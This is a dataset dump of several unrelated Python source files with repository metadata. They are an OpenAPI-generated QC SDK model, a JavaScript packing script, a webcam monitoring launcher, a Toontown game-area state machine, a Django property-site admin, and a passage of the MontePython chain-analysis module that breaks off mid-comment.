| apache-2.0 | -6,665,234,963,519,729,000 | 33.386364 | 77 | 0.497273 | false |
Telestream/telestream-cloud-python-sdk | telestream_cloud_qc_sdk/telestream_cloud_qc/models/framesize_test.py | 1 | 5637 | # coding: utf-8
"""
Qc API
Qc API # noqa: E501
The version of the OpenAPI document: 3.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from telestream_cloud_qc.configuration import Configuration
class FramesizeTest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'horizontal_size': 'int',
'vertical_size': 'int',
'reject_on_error': 'bool',
'checked': 'bool'
}
attribute_map = {
'horizontal_size': 'horizontal_size',
'vertical_size': 'vertical_size',
'reject_on_error': 'reject_on_error',
'checked': 'checked'
}
def __init__(self, horizontal_size=None, vertical_size=None, reject_on_error=None, checked=None, local_vars_configuration=None): # noqa: E501
"""FramesizeTest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._horizontal_size = None
self._vertical_size = None
self._reject_on_error = None
self._checked = None
self.discriminator = None
if horizontal_size is not None:
self.horizontal_size = horizontal_size
if vertical_size is not None:
self.vertical_size = vertical_size
if reject_on_error is not None:
self.reject_on_error = reject_on_error
if checked is not None:
self.checked = checked
@property
def horizontal_size(self):
"""Gets the horizontal_size of this FramesizeTest. # noqa: E501
:return: The horizontal_size of this FramesizeTest. # noqa: E501
:rtype: int
"""
return self._horizontal_size
@horizontal_size.setter
def horizontal_size(self, horizontal_size):
"""Sets the horizontal_size of this FramesizeTest.
:param horizontal_size: The horizontal_size of this FramesizeTest. # noqa: E501
:type: int
"""
self._horizontal_size = horizontal_size
@property
def vertical_size(self):
"""Gets the vertical_size of this FramesizeTest. # noqa: E501
:return: The vertical_size of this FramesizeTest. # noqa: E501
:rtype: int
"""
return self._vertical_size
@vertical_size.setter
def vertical_size(self, vertical_size):
"""Sets the vertical_size of this FramesizeTest.
:param vertical_size: The vertical_size of this FramesizeTest. # noqa: E501
:type: int
"""
self._vertical_size = vertical_size
@property
def reject_on_error(self):
"""Gets the reject_on_error of this FramesizeTest. # noqa: E501
:return: The reject_on_error of this FramesizeTest. # noqa: E501
:rtype: bool
"""
return self._reject_on_error
@reject_on_error.setter
def reject_on_error(self, reject_on_error):
"""Sets the reject_on_error of this FramesizeTest.
:param reject_on_error: The reject_on_error of this FramesizeTest. # noqa: E501
:type: bool
"""
self._reject_on_error = reject_on_error
@property
def checked(self):
"""Gets the checked of this FramesizeTest. # noqa: E501
:return: The checked of this FramesizeTest. # noqa: E501
:rtype: bool
"""
return self._checked
@checked.setter
def checked(self, checked):
"""Sets the checked of this FramesizeTest.
:param checked: The checked of this FramesizeTest. # noqa: E501
:type: bool
"""
self._checked = checked
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FramesizeTest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, FramesizeTest):
return True
return self.to_dict() != other.to_dict()
| mit | -44,024,424,667,962,370 | 27.326633 | 146 | 0.576903 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/static/scripts/pack_scripts.py | 1 | 1952 | #!/usr/bin/env python
import sys, os
from glob import glob
from subprocess import call
from shutil import copyfile
from os import path
# Scripts that should not be packed -- just copied
do_not_pack = set()
cmd = "java -jar ../../scripts/yuicompressor.jar --charset utf-8 --type js %(fname)s -o packed/%(fname)s"
# cmd = "java -jar ../../scripts/compiler.jar --compilation_level SIMPLE_OPTIMIZATIONS --js %(fname)s --js_output_file packed/%(fname)s"
# If specific scripts specified on command line, just pack them, otherwise pack
# all.
def recursive_glob( pattern, excluded_dirs ):
"""
Returns all items that match pattern in root and subdirectories.
"""
a_dir, a_pattern = path.split( pattern )
# Skip excluded dirs.
if a_dir in excluded_dirs:
return []
# Search current dir.
# print a_dir, a_pattern
rval = glob( pattern )
for item in glob( path.join( a_dir, "*" ) ):
if path.isdir( item ):
rval.extend( recursive_glob( path.join( item, a_pattern ), excluded_dirs ) )
return rval
# Get files to pack.
if len( sys.argv ) > 1:
to_pack = sys.argv[1:]
else:
to_pack = recursive_glob( "*.js", [ "packed" ] )
for fname in to_pack:
d = dict( fname=fname )
packed_fname = path.join( 'packed', fname )
# Only copy if full version is newer than packed version.
if path.exists( packed_fname ) and ( path.getmtime( fname ) < path.getmtime( packed_fname ) ):
print "Packed is current: %s" % fname
continue
print "%(fname)s --> packed/%(fname)s" % d
# Create destination dir if necessary.
dir, name = os.path.split( packed_fname )
if not path.exists( dir ):
print "Creating needed directory %s" % dir
os.makedirs( dir )
# Copy/pack.
if fname in do_not_pack:
copyfile( fname, path.join( packed_fname ) )
else:
out = call( cmd % d, shell=True )
| gpl-3.0 | -941,269,120,476,930,600 | 28.134328 | 136 | 0.618852 | false |
Skydes/Monitoring | src/main.py | 1 | 2622 | #!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: main.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Queue, Lock
from Queue import Empty
from rocket import Rocket
from threading import Thread
import signal
import time
import cv2
import json
import logging, logging.handlers
from capture import Capture
from processing import Processing
from cloud import Dropbox
from server import *
QUEUE_MAXSIZE = 10
PORT = 8000
# Setup logging
logFormatter = logging.Formatter(fmt='%(levelname)-8s %(module)-15s %(asctime)-20s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
fileHandler = logging.handlers.RotatingFileHandler("./log/app.log", maxBytes=30000, backupCount=5)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Setup configuration
with open("conf.json") as json_file:
app.conf.update(json.load(json_file))
# Initialize and configure threads
app.pre_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.post_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.server_queue = Queue(maxsize=1)
app.conf_lock = Lock()
# Make the main process ignore SIGINT
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
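# Ctrl-C (SIGINT) is ignored from here until the original handler is restored
# below, i.e. while the capture/processing/upload workers are created and started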
app.capture_th = Capture(app.pre_queue, app.conf, app.conf_lock)
app.processing_th = Processing(app.pre_queue, app.post_queue, app.conf, app.conf_lock)
app.dropbox_th = Dropbox(app.post_queue, app.server_queue, app.conf, app.conf_lock)
app.capture_th.setDevice("video0")
# Launch threads
app.dropbox_th.start()
app.processing_th.start()
app.capture_th.start()
logging.info("Threads started.")
# Restore SIGINT handler
signal.signal(signal.SIGINT, original_sigint_handler)
# Launch server
rocket_server = Rocket(('localhost', PORT), 'wsgi', {'wsgi_app': app})
app.server_th = Thread(target=rocket_server.start, name='rocket_server')
app.server_th.start()
logging.getLogger("Rocket").setLevel(logging.INFO)
logging.info("Server started.")
try:
while app.server_th.is_alive():
app.server_th.join(1)
except (KeyboardInterrupt, SystemExit):
rocket_server.stop()
logging.info("Server stopped.")
app.capture_th.stop()
app.capture_th.join()
app.processing_th.stop()
app.processing_th.join()
app.dropbox_th.stop()
app.dropbox_th.join()
cv2.destroyAllWindows()
| bsd-3-clause | -800,108,648,192,495,700 | 26.893617 | 130 | 0.745995 | false |
ToonTownInfiniteRepo/ToontownInfinite | toontown/coghq/MintInterior.py | 1 | 10229 | from direct.directnotify import DirectNotifyGlobal
from toontown.battle import BattlePlace
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.showbase import BulletinBoardWatcher
from pandac.PandaModules import *
from otp.distributed.TelemetryLimiter import RotationLimitToH, TLGatherAllAvs
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.hood import ZoneUtil
from toontown.toonbase import TTLocalizer
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownBattleGlobals
from toontown.coghq import DistributedMint
from otp.nametag import NametagGlobals
class MintInterior(BattlePlace.BattlePlace):
notify = DirectNotifyGlobal.directNotify.newCategory('MintInterior')
def __init__(self, loader, parentFSM, doneEvent):
BattlePlace.BattlePlace.__init__(self, loader, doneEvent)
self.parentFSM = parentFSM
self.zoneId = loader.mintId
self.fsm = ClassicFSM.ClassicFSM('MintInterior', [State.State('start', self.enterStart, self.exitStart, ['walk', 'teleportIn', 'fallDown']),
State.State('walk', self.enterWalk, self.exitWalk, ['push',
'sit',
'stickerBook',
'WaitForBattle',
'battle',
'died',
'teleportOut',
'squished',
'DFA',
'fallDown',
'stopped']),
State.State('stopped', self.enterStopped, self.exitStopped, ['walk', 'teleportOut', 'stickerBook']),
State.State('sit', self.enterSit, self.exitSit, ['walk', 'died', 'teleportOut']),
State.State('push', self.enterPush, self.exitPush, ['walk', 'died', 'teleportOut']),
State.State('stickerBook', self.enterStickerBook, self.exitStickerBook, ['walk',
'battle',
'DFA',
'WaitForBattle',
'died',
'teleportOut']),
State.State('WaitForBattle', self.enterWaitForBattle, self.exitWaitForBattle, ['battle',
'walk',
'died',
'teleportOut']),
State.State('battle', self.enterBattle, self.exitBattle, ['walk', 'teleportOut', 'died']),
State.State('fallDown', self.enterFallDown, self.exitFallDown, ['walk', 'died', 'teleportOut']),
State.State('squished', self.enterSquished, self.exitSquished, ['walk', 'died', 'teleportOut']),
State.State('teleportIn', self.enterTeleportIn, self.exitTeleportIn, ['walk',
'teleportOut',
'quietZone',
'died']),
State.State('teleportOut', self.enterTeleportOut, self.exitTeleportOut, ['teleportIn',
'FLA',
'quietZone',
'WaitForBattle']),
State.State('DFA', self.enterDFA, self.exitDFA, ['DFAReject', 'teleportOut']),
         State.State('DFAReject', self.enterDFAReject, self.exitDFAReject, ['walk', 'teleportOut']),
State.State('died', self.enterDied, self.exitDied, ['teleportOut']),
State.State('FLA', self.enterFLA, self.exitFLA, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['teleportIn']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
def load(self):
self.parentFSM.getStateNamed('mintInterior').addChild(self.fsm)
BattlePlace.BattlePlace.load(self)
self.music = base.loadMusic('phase_9/audio/bgm/CHQ_FACT_bg.ogg')
def unload(self):
self.parentFSM.getStateNamed('mintInterior').removeChild(self.fsm)
del self.music
del self.fsm
del self.parentFSM
BattlePlace.BattlePlace.unload(self)
def enter(self, requestStatus):
self.fsm.enterInitialState()
base.transitions.fadeOut(t=0)
base.localAvatar.inventory.setRespectInvasions(0)
base.cr.forbidCheesyEffects(1)
self._telemLimiter = TLGatherAllAvs('MintInterior', RotationLimitToH)
def commence(self = self):
NametagGlobals.setMasterArrowsOn(1)
self.fsm.request(requestStatus['how'], [requestStatus])
base.playMusic(self.music, looping=1, volume=0.8)
base.transitions.irisIn()
mint = bboard.get(DistributedMint.DistributedMint.ReadyPost)
self.loader.hood.spawnTitleText(mint.mintId, mint.floorNum)
self.mintReadyWatcher = BulletinBoardWatcher.BulletinBoardWatcher('MintReady', DistributedMint.DistributedMint.ReadyPost, commence)
self.mintDefeated = 0
self.acceptOnce(DistributedMint.DistributedMint.WinEvent, self.handleMintWinEvent)
if __debug__ and 0:
self.accept('f10', lambda : messenger.send(DistributedMint.DistributedMint.WinEvent))
self.confrontedBoss = 0
def handleConfrontedBoss(self = self):
self.confrontedBoss = 1
self.acceptOnce('localToonConfrontedMintBoss', handleConfrontedBoss)
def exit(self):
NametagGlobals.setMasterArrowsOn(0)
bboard.remove(DistributedMint.DistributedMint.ReadyPost)
self._telemLimiter.destroy()
del self._telemLimiter
base.cr.forbidCheesyEffects(0)
base.localAvatar.inventory.setRespectInvasions(1)
self.fsm.requestFinalState()
self.loader.music.stop()
self.music.stop()
self.ignoreAll()
del self.mintReadyWatcher
def enterWalk(self, teleportIn = 0):
BattlePlace.BattlePlace.enterWalk(self, teleportIn)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterPush(self):
BattlePlace.BattlePlace.enterPush(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterWaitForBattle(self):
MintInterior.notify.debug('enterWaitForBattle')
BattlePlace.BattlePlace.enterWaitForBattle(self)
if base.localAvatar.getParent() != render:
base.localAvatar.wrtReparentTo(render)
base.localAvatar.b_setParent(ToontownGlobals.SPRender)
def exitWaitForBattle(self):
MintInterior.notify.debug('exitWaitForBattle')
BattlePlace.BattlePlace.exitWaitForBattle(self)
def enterBattle(self, event):
MintInterior.notify.debug('enterBattle')
self.music.stop()
BattlePlace.BattlePlace.enterBattle(self, event)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterTownBattle(self, event):
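        # The skill-credit multiplier depends on the mint zone; apply it to the
        # local toon's inventory and forward it to the town battle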
mult = ToontownBattleGlobals.getMintCreditMultiplier(self.zoneId)
base.localAvatar.inventory.setBattleCreditMultiplier(mult)
self.loader.townBattle.enter(event, self.fsm.getStateNamed('battle'), bldg=1, creditMultiplier=mult)
def exitBattle(self):
MintInterior.notify.debug('exitBattle')
BattlePlace.BattlePlace.exitBattle(self)
self.loader.music.stop()
base.playMusic(self.music, looping=1, volume=0.8)
def enterStickerBook(self, page = None):
BattlePlace.BattlePlace.enterStickerBook(self, page)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterSit(self):
BattlePlace.BattlePlace.enterSit(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterZone(self, zoneId):
pass
def enterTeleportOut(self, requestStatus):
MintInterior.notify.debug('enterTeleportOut()')
BattlePlace.BattlePlace.enterTeleportOut(self, requestStatus, self.__teleportOutDone)
def __processLeaveRequest(self, requestStatus):
hoodId = requestStatus['hoodId']
if hoodId == ToontownGlobals.MyEstate:
self.getEstateZoneAndGoHome(requestStatus)
else:
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
def __teleportOutDone(self, requestStatus):
MintInterior.notify.debug('__teleportOutDone()')
messenger.send('leavingMint')
messenger.send('localToonLeft')
if self.mintDefeated and not self.confrontedBoss:
self.fsm.request('FLA', [requestStatus])
else:
self.__processLeaveRequest(requestStatus)
def exitTeleportOut(self):
MintInterior.notify.debug('exitTeleportOut()')
BattlePlace.BattlePlace.exitTeleportOut(self)
def handleMintWinEvent(self):
MintInterior.notify.debug('handleMintWinEvent')
if base.cr.playGame.getPlace().fsm.getCurrentState().getName() == 'died':
return
self.mintDefeated = 1
if 1:
zoneId = ZoneUtil.getHoodId(self.zoneId)
else:
zoneId = ZoneUtil.getSafeZoneId(base.localAvatar.defaultZone)
self.fsm.request('teleportOut', [{'loader': ZoneUtil.getLoaderName(zoneId),
'where': ZoneUtil.getToonWhereName(zoneId),
'how': 'teleportIn',
'hoodId': zoneId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}])
def enterDied(self, requestStatus, callback = None):
MintInterior.notify.debug('enterDied')
def diedDone(requestStatus, self = self, callback = callback):
if callback is not None:
callback()
messenger.send('leavingMint')
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
return
BattlePlace.BattlePlace.enterDied(self, requestStatus, diedDone)
def enterFLA(self, requestStatus):
MintInterior.notify.debug('enterFLA')
self.flaDialog = TTDialog.TTGlobalDialog(message=TTLocalizer.ForcedLeaveMintAckMsg, doneEvent='FLADone', style=TTDialog.Acknowledge, fadeScreen=1)
def continueExit(self = self, requestStatus = requestStatus):
self.__processLeaveRequest(requestStatus)
self.accept('FLADone', continueExit)
self.flaDialog.show()
def exitFLA(self):
MintInterior.notify.debug('exitFLA')
if hasattr(self, 'flaDialog'):
self.flaDialog.cleanup()
del self.flaDialog
| mit | 7,421,334,415,014,637,000 | 41.620833 | 154 | 0.655587 | false |
signalfire/django-property | homes/admin.py | 1 | 2271 | from mapwidgets.widgets import GooglePointFieldWidget
from django.contrib import admin
from django.contrib.gis.db import models
from django.utils.translation import ugettext as _
from homes.models import Block, Banner, SEO, SearchPrice, Branch, PropertyTenure, PropertyType, Alert, MediaType
class SearchPriceAdmin(admin.ModelAdmin):
fields = ('type', 'label', 'price')
class BranchAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
fieldsets = (
(_('General'), {
'fields': ['name', 'slug', 'status']
}),
(_('Address'), {
'fields': ['address_1', 'address_2', 'address_3', 'town_city', 'county', 'postcode'],
}),
(_('Geographic'), {
'fields': ['location']
}),
(_('Contact'), {
'fields': ['telephone', 'email']
}),
(_('Details'), {
'fields': ['details', 'opening_hours']
})
)
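    # use the Google map widget for the PointField instead of the default form widget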
formfield_overrides = {
models.PointField: {"widget": GooglePointFieldWidget}
}
class Media:
css = {
'all':['build/css/admin/override/map.min.css']
}
class PropertyTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class MediaTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class PropertyTenureAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class BlockAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
list_display = ('name', 'slug')
fields = ('name','slug','content','status')
class BannerAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('title',), }
list_display = ('title', 'slug', 'action', 'label')
fields = ('title', 'subtitle', 'action', 'label', 'slug', 'attachment', 'status')
class SEOAdmin(admin.ModelAdmin):
list_display = ('url', 'title')
admin.site.register(SearchPrice, SearchPriceAdmin)
admin.site.register(Branch, BranchAdmin)
admin.site.register(Banner, BannerAdmin)
admin.site.register(PropertyType, PropertyTypeAdmin)
admin.site.register(PropertyTenure, PropertyTenureAdmin)
admin.site.register(MediaType, MediaTypeAdmin)
admin.site.register(Block, BlockAdmin)
admin.site.register(SEO, SEOAdmin)
admin.site.register(Alert)
| mit | 5,921,387,022,681,501,000 | 28.115385 | 112 | 0.630559 | false |
miguelzuma/montepython_zuma | montepython/analyze.py | 1 | 95056 | """
.. module:: analyze
:synopsis: Extract data from chains and produce plots
.. moduleauthor:: Karim Benabed <[email protected]>
.. moduleauthor:: Benjamin Audren <[email protected]>
Collection of functions needed to analyze the Markov chains.
This module defines as well a class :class:`Information`, that stores useful
quantities, and shortens the argument passing between the functions.
.. note::
Some of the methods used in this module are directly adapted from the
`CosmoPmc <http://www.cosmopmc.info>`_ code from Kilbinger et. al.
"""
import os
import math
import numpy as np
from itertools import count
# The root plotting module, to change options like font sizes, etc...
import matplotlib
# The following line suppresses the need for an X server
matplotlib.use("Agg")
# Module for handling display
import matplotlib.pyplot as plt
# Module to handle warnings from matplotlib
import warnings
import importlib
import io_mp
from itertools import ifilterfalse
from itertools import ifilter
import scipy.ndimage
# Defined to remove the burnin for all the points that were produced before the
# first time where -log-likelihood <= min-minus-log-likelihood+LOG_LKL_CUTOFF
LOG_LKL_CUTOFF = 3
NUM_COLORS = 6
def analyze(command_line):
"""
Main function, does the entire analysis.
It calls in turn all the other routines from this module. To limit the
    arguments of each function to a reasonable size, a :class:`Information`
instance is used. This instance is initialized in this function, then
appended by the other routines.
"""
# Check if the scipy module has the interpolate method correctly
# installed (should be the case on every linux distribution with
# standard numpy)
try:
from scipy.interpolate import interp1d
Information.has_interpolate_module = True
except ImportError:
Information.has_interpolate_module = False
warnings.warn(
'No cubic interpolation done (no interpolate method found ' +
'in scipy), only linear')
# Determine how many different folders are asked through the 'info'
# command, and create as many Information instances
files = separate_files(command_line.files)
# Create an instance of the Information class for each subgroup found in
# the previous function. They will each hold all relevant information, and
# be used as a compact way of exchanging information between functions
information_instances = []
for item in files:
info = Information(command_line)
information_instances.append(info)
# Prepare the files, according to the case, load the log.param, and
# prepare the output (plots folder, .covmat, .info and .log files).
# After this step, info.files will contain all chains.
status = prepare(item, info)
# If the preparation step generated new files (for instance,
# translating from NS or CH to Markov Chains) this routine should stop
# now.
if not status:
return
# Compute the mean, maximum of likelihood, 1-sigma variance for this
# main folder. This will create the info.chain object, which contains
# all the points computed stacked in one big array.
convergence(info)
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
command_line.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
command_line.update = 0
    # compute covariance matrix, except when we are in update mode and convergence is too bad or too good
if command_line.update and (np.amax(info.R) > 3. or np.amax(info.R) < 0.4):
print '--> Not computing covariance matrix'
else:
try:
if command_line.want_covmat:
print '--> Computing covariance matrix'
info.covar = compute_covariance_matrix(info)
# Writing it out in name_of_folder.covmat
io_mp.write_covariance_matrix(
info.covar, info.backup_names, info.cov_path)
except:
print '--> Computing covariance matrix failed'
pass
# Store an array, sorted_indices, containing the list of indices
# corresponding to the line with the highest likelihood as the first
# element, and then as decreasing likelihood
info.sorted_indices = info.chain[:, 1].argsort(0)
# Writing the best-fit model in name_of_folder.bestfit
bestfit_line = [elem*info.scales[i, i] for i, elem in
enumerate(info.chain[info.sorted_indices[0], 2:])]
io_mp.write_bestfit_file(bestfit_line, info.backup_names,
info.best_fit_path)
if not command_line.minimal:
# Computing 1,2 and 3-sigma errors, and plot. This will create the
# triangle and 1d plot by default.
compute_posterior(information_instances)
print '--> Writing .info and .tex files'
for info in information_instances:
info.write_information_files()
# when called by MCMC in update mode, return R values so that they can be written for information in the chains
if command_line.update:
return info.R
def prepare(files, info):
"""
Scan the whole input folder, and include all chains in it.
Since you can decide to analyze some file(s), or a complete folder, this
    function first needs to distinguish between the two cases.
.. warning::
If someday you change the way the chains are named, remember to change
here too, because this routine assumes the chains have a double
underscore in their names.
.. note::
Only files ending with .txt will be selected, to keep compatibility
with CosmoMC format
.. note::
New in version 2.0.0: if you ask to analyze a Nested Sampling
sub-folder (i.e. something that ends in `NS` with capital letters), the
analyze module will translate the output from Nested Sampling to
standard chains for Monte Python, and stops. You can then run the
`-- info` flag on the whole folder. **This procedure is not necessary
if the run was complete, but only if the Nested Sampling run was killed
before completion**.
Parameters
----------
files : list
list of potentially only one element, containing the files to analyze.
This can be only one file, or the encompassing folder, files
info : Information instance
Used to store the result
"""
# First test if the folder is a Nested Sampling or CosmoHammer folder. If
# so, call the module's own routine through the clean conversion function,
# which will translate the output of this other sampling into MCMC chains
# that can then be analyzed.
modules = ['nested_sampling', 'cosmo_hammer']
tags = ['NS', 'CH']
for module_name, tag in zip(modules, tags):
action_done = clean_conversion(module_name, tag, files[0])
if action_done:
return False
# If the input command was an entire folder, then grab everything in it.
# Too small files (below 600 octets) and subfolders are automatically
# removed.
folder, files, basename = recover_folder_and_files(files)
info.files = files
info.folder = folder
info.basename = basename
# Check if the log.param file exists
parameter_file_path = os.path.join(folder, 'log.param')
if os.path.isfile(parameter_file_path):
if os.path.getsize(parameter_file_path) == 0:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"seems empty")
else:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"is missing in the analyzed folder?")
# If the folder has no subdirectory, then go for a simple infoname,
# otherwise, call it with the last name
basename = (os.path.basename(folder) if os.path.basename(folder) != '.'
else os.path.basename(os.path.abspath(
os.path.join(folder, '..'))))
info.v_info_path = os.path.join(folder, basename+'.v_info')
info.h_info_path = os.path.join(folder, basename+'.h_info')
info.tex_path = os.path.join(folder, basename+'.tex')
info.cov_path = os.path.join(folder, basename+'.covmat')
info.log_path = os.path.join(folder, basename+'.log')
info.best_fit_path = os.path.join(folder, basename+'.bestfit')
info.param_path = parameter_file_path
return True
def convergence(info):
"""
Compute convergence for the desired chains, using Gelman-Rubin diagnostic
Chains have been stored in the info instance of :class:`Information`. Note
    that the G-R diagnostic can be computed for a single chain, although it will
most probably give absurd results. To do so, it separates the chain into
three subchains.
"""
# Recovering parameter names and scales, creating tex names,
extract_parameter_names(info)
# Now that the number of parameters is known, the array containing bounds
# can be initialised
info.bounds = np.zeros((len(info.ref_names), len(info.levels), 2))
# Circle through all files to find the global maximum of likelihood
#print '--> Finding global maximum of likelihood'
find_maximum_of_likelihood(info)
# Restarting the circling through files, this time removing the burnin,
# given the maximum of likelihood previously found and the global variable
# LOG_LKL_CUTOFF. spam now contains all the accepted points that were
# explored once the chain moved within min_minus_lkl - LOG_LKL_CUTOFF.
# If the user asks for a keep_fraction <1, this is also the place where
# a fraction (1-keep_fraction) is removed at the beginning of each chain.
#print '--> Removing burn-in'
spam = remove_bad_points(info)
info.remap_parameters(spam)
# Now that the list spam contains all the different chains removed of
# their respective burn-in, proceed to the convergence computation
# 2D arrays for mean and var, one column will contain the total (over
# all chains) mean (resp. variance), and each other column the
# respective chain mean (resp. chain variance). R only contains the
# values for each parameter. Therefore, mean and var will have len(spam)+1
# as a first dimension
mean = np.zeros((len(spam)+1, info.number_parameters))
var = np.zeros((len(spam)+1, info.number_parameters))
R = np.zeros(info.number_parameters)
# Store the total number of points, and the total in each chain
total = np.zeros(len(spam)+1)
for j in xrange(len(spam)):
total[j+1] = spam[j][:, 0].sum()
total[0] = total[1:].sum()
# Compute mean and variance for each chain
print '--> Computing mean values'
compute_mean(mean, spam, total)
print '--> Computing variance'
compute_variance(var, mean, spam, total)
print '--> Computing convergence criterium (Gelman-Rubin)'
# Gelman Rubin Diagnostic:
# Computes a quantity linked to the ratio of the mean of the variances of
# the different chains (within), and the variance of the means (between)
# Note: This is not strictly speaking the Gelman Rubin test, defined for
# same-length MC chains. Our quantity is defined without the square root,
# which should not change much the result: a small sqrt(R) will still be a
# small R. The same convention is used in CosmoMC, except for the weighted
# average: we decided to do the average taking into account that longer
# chains should count more
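    # The quantity reported below is R = between/within, where 'within' is the
    # weighted mean of the single-chain variances and 'between' the weighted
    # variance of the chain means, the weights being the chain lengths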
within = 0
between = 0
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
within += total[j+1]*var[j+1, i]
between += total[j+1]*(mean[j+1, i]-mean[0, i])**2
within /= total[0]
between /= (total[0]-1)
R[i] = between/within
if i == 0:
print ' -> R-1 is %.6f' % R[i], '\tfor ', info.ref_names[i]
else:
print ' %.6f' % R[i], '\tfor ', info.ref_names[i]
# Log finally the total number of steps, and absolute loglikelihood
with open(info.log_path, 'a') as log:
log.write("--> Total number of steps: %d\n" % (
info.steps))
log.write("--> Total number of accepted steps: %d\n" % (
info.accepted_steps))
log.write("--> Minimum of -logLike : %.2f" % (
info.min_minus_lkl))
# Store the remaining members in the info instance, for further writing to
# files, storing only the mean and total of all the chains taken together
info.mean = mean[0]
info.R = R
info.total = total[0]
# Create the main chain, which consists in all elements of spam
# put together. This will serve for the plotting.
info.chain = np.vstack(spam)
def compute_posterior(information_instances):
"""
    computes the marginalized posterior distributions, and optionally plots
them
Parameters
----------
information_instances : list
        list of information objects, initialised on the given folders or list
        of files given as input. For each of these instances, plot the 1d and
        2d posterior distributions, depending on the flags stored in the
        instances, coming from command line arguments or read from a file.
"""
# For convenience, store as `conf` the first element of the list
# information_instances, since it will be called often to check for
# configuration parameters
conf = information_instances[0]
# Pre configuration of the output, note that changes to the font size
# will occur later on as well, to obtain a nice scaling.
matplotlib.rc('text', usetex=True)
matplotlib.rc('font', size=11)
matplotlib.rc('xtick', labelsize='8')
matplotlib.rc('ytick', labelsize='8')
# Recover max and min values for each instance, defining the a priori place
# of ticks (in case of a comparison, this should change)
for info in information_instances:
info.define_ticks()
# If plots/ folder in output folder does not exist, create it
if os.path.isdir(os.path.join(info.folder, 'plots')) is False:
os.mkdir(os.path.join(info.folder, 'plots'))
# Determine the total number of parameters to plot, based on the list
# without duplicates of the plotted parameters of all information instances
plotted_parameters = []
# For printing not in latex
ref_names = []
for info in information_instances:
for index, name in enumerate(info.plotted_parameters):
if name not in plotted_parameters:
plotted_parameters.append(name)
ref_names.append(info.ref_names[index])
if len(plotted_parameters) == 0:
raise io_mp.AnalyzeError(
"You provided no parameters to analyze, probably by selecting"
" wrong parameters names in the '--extra' file.")
# Find the appropriate number of columns and lines for the 1d posterior
# plot
if conf.num_columns_1d == None:
num_columns = int(round(math.sqrt(len(plotted_parameters))))
else:
num_columns = conf.num_columns_1d
num_lines = int(math.ceil(len(plotted_parameters)*1.0/num_columns))
# For special needs, you can impose here a different number of columns and lines in the 1d plot
# Here is a commented example:
# if (len(plotted_parameters) == 10):
# num_columns = 5
# num_lines = 2
# Create the figures
# which will be 3*3 inches per subplot, quickly growing!
if conf.plot:
fig1d = plt.figure(num=1, figsize=(
3*num_columns,
3*num_lines), dpi=80)
if conf.plot_2d:
fig2d = plt.figure(num=2, figsize=(
3*len(plotted_parameters),
3*len(plotted_parameters)), dpi=80)
# Create the name of the files, concatenating the basenames with
# underscores.
file_name = "_".join(
[info.basename for info in information_instances])
# Loop over all the plotted parameters
# There will be two indices at all time, the one running over the plotted
# parameters, `index`, and the one corresponding to the actual column in
# the actual file, `native_index`. For instance, if you try to plot only
